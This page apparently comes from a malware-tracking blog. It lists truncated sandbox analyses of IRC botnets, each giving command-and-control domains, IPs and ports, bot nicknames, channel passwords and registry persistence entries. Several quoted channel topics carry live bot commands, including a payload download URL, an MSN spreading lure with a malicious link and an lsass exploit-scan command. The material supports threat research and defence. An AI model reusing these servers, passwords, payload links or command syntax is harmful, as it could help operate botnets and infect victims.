Author: Pig

irandy.info

Uncategorized

Remote Host Port Number irandy.info 8160 NICK {USA-XP}481463 USER yjmpomf * 0 :COMPUTERNAME * The following ports were open in the system: Port Protocol Process 1033 TCP svhost.exe (%Windir%svhost.exe) 1034 TCP svhost.exe (%Windir%svhost.exe) * The following Host Name was requested from a host database: o irandy.info Other details * To mark the presence in theRead more...

stores.dellhp.net

Uncategorized

# Remote Address: 82.114.87.46 # Host Name: stores.dellhp.net # Transport Protocol: TCP # Remote Address: 82.114.87.46 # Remote Port: 1234 # Protocol: IRC * IRC Data o User Name: 3052 o Host Name: “” o Server Name: o Real Name: 3052 o Nick Name: n[USA|XP]8081698 o Non RFC Conform: 1 + Channel # Name: #dl#Read more...

173.201.179.47

Uncategorized

Remote Host Port Number 173.201.179.47 8016 NICK [00|USA|492539] PONG sv.privatenetwork.pv USER XP-0542 * 0 :COMPUTERNAME MODE [00|USA|492539] +su JOIN #private MODE #private +su NICK [00|USA|890609] USER XP-0460 * 0 :COMPUTERNAME MODE [00|USA|890609] +su * The following port was open in the system: Port Protocol Process 1054 TCP service.exe (%Windir%service.exe) Registry Modifications * The following RegistryRead more...

electric-servers.com

Uncategorized

electric-servers.com 217.23.7.121 C&C Server: 217.23.7.121:6667 Server Password: Username: XP-0733 Nickname: [DEU-[L]-65709]NEW Channel: #Cracker (Password: none) Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftGDIPlus “FontCachePath” = C:Dokumente und EinstellungenAdministratorLokale EinstellungenAnwendungsdaten HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Micrososft Omg” = taskmgrr.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “Micrososft Omg” = taskmgrr.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:Dokumente und EinstellungenAdministratorLokale EinstellungenTempfile1.exe” = C:Dokumente und EinstellungenAdministratorLokale EinstellungenTempfile1.exe:*:Enabled:Micrososft OmgRead more...

teamwaffle.net(SPAM BOT)

Uncategorized

boards.4chan.org boards.4chan.org 204.152.204.174 static.4chan.org static.4chan.org 204.152.204.172 teamwaffle.net teamwaffle.net 94.102.55.216 0.thumbs.4chan.org 1.thumbs.4chan.org 0.thumbs.4chan.org 204.152.204.169 1.thumbs.4chan.org 204.152.204.169 2.thumbs.4chan.org 2.thumbs.4chan.org 204.152.204.169 edge.quantserve.com edge.quantserve.com 212.201.100.179 pixel.quantserve.com pixel.quantserve.com 4.71.209.20 www.google-analytics.com www.google-analytics.com 74.125.43.113 sys.4chan.org sys.4chan.org 204.152.204.156 UDP Connections Remote IP Address: 127.0.0.1 Port: 1128 Send Datagram: 401 packet(s) of size 1 Recv Datagram: 401 packet(s) of size 1 Download URLs http://204.152.204.174/b/Read more...

just.addsyrup.net

Uncategorized

just.addsyrup.net 174.120.225.25 C&C Server: 174.120.225.25:6667 Server Password: Username: 9273 Nickname: [9273|DEU|XP] Channel: ##syrup## (Password: da32rga4a) Channeltopic: :http://teamwaffle.net/bots/syrup.exe Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Microsoft Windows Hosting Service Login” = C:DOKUME~1ADMINI~1LOKALE~1Tempexplorer.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Microsoft Windows Hosting Service Login” = C:DOKUME~1ADMINI~1LOKALE~1Tempexplorer.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “Microsoft Windows Hosting Service Login” = C:DOKUME~1ADMINI~1LOKALE~1Tempexplorer.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggleRead more...

und.shkumbimi.net(JimyGJ next botnet)

Uncategorized

und.shkumbimi.net 122.183.243.48 Opened listening TCP connection on port: 559 C&C Server: 122.183.243.48:12351 Server Password: Username: pdndt Nickname: pdndt Channel: (Password: ) Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows System Configuration” = C:WINDOWSwinupdates.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext” HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File” HKEY_CURRENT_USERSoftwareMicrosoftCTFRead more...

www.MSNAREA.COM

Uncategorized

www.MSNAREA.COM 173.208.34.249 membres.lycos.fr membres.lycos.fr 213.131.252.251 membres.multimania.fr membres.multimania.fr 213.131.252.251 Download URLs http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr) C&C Server: 173.208.34.249:80 Server Password: Username: SP3-943 Nickname: [N00_DEU_XP_7839707]_CHAR(0x08)_ë@ Channel: (Password: ) Channeltopic: C&C Server: 173.208.34.249:81 Server Password: Username: SP3-720 Nickname: [00_DEU_XP_4068211] Channel: #xx32 (Password: ) Channeltopic: :.asc -SRead more...

wiss.lulzimehodza.com(JimyGJ bots)

Uncategorized

Again JimyGJ botnet another lamer from kuksi the land of pidhi arushes – DNS Queries: Name Query Type Query Result Successful Protocol wiss.lulzimehodza.com DNS_TYPE_A 122.183.243.42 YES udp 122.183.243.42:12351 Nick: `tsnugx Username: `tsnugx Joined Channel: #.serve1 with Password kr Joined Channel: #.a with Password -s Channel Topic for Channel #.serve1: “.join #.dc |`adv.start lsass 75 3Read more...

amzo.no-ip.biz

Uncategorized

Username: XP-4316 Nickname: [DEU|00|P|67741] Channel: #Amzo (Password: pakie) Channeltopic: :.msn.msg OMG! Who the fuck uploaded this of you? http://amzo.escriptirc.com/DSC120394.com C&C Server: 217.23.7.121:6667 Server Password: Username: XP-5137 Nickname: [DEU|00|P|97851] Channel: #Amzo (Password: pakie) Channeltopic: :.msn.msg OMG! Who the fuck uploaded this of you? http://amzo.escriptirc.com/DSC120394.com amzo.no-ip.biz 217.23.7.121 Opened listening TCP connection on port: 113 C&C Server: 217.23.7.121:6667Read more...